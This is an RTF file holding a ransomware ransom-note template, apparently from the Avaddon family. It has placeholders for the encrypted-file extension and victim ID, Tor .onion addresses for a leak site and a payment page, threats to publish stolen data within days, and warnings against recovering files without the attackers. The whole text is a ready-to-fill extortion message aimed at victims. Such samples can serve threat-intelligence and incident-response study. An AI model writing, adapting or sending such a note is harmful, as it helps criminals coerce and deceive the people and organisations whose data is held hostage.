{\rtf1\ansi\ansicpg1252\cocoartf2761
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\fs24 \cf0 -------===    Your network has been infected!    ===-------\
 \
 \
*****************    DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED    *****************\
 \
 \
All your documents, photos, databases and other important files have been encrypted and have the extension: \{\{ext\}\}\
 \
You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!\
 \
The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!\
 \
We have also downloaded a lot of private data from your network.\
If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.\
 \
You can get more information on our page, which is located in a Tor hidden network.\
 \
 \
How to get to our page\
--------------------------------------------------------------------------------\
|\
|  1. Download Tor browser - https://www.torproject.org/\
|\
|  2. Install Tor browser\
|\
|  3. Open link in Tor browser - avaddonbotrxmuyl.onion\
|\
|  4. Follow the instructions on this page\
|\
--------------------------------------------------------------------------------\
 \
Your ID:\
--------------------------------------------------------------------------------\
 \
\{\{id\}\}\
 \
--------------------------------------------------------------------------------\
 \
* DO NOT TRY TO RECOVER FILES YOURSELF!\
 \
* DO NOT MODIFY ENCRYPTED FILES!\
 \
* * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * *\
\
                    }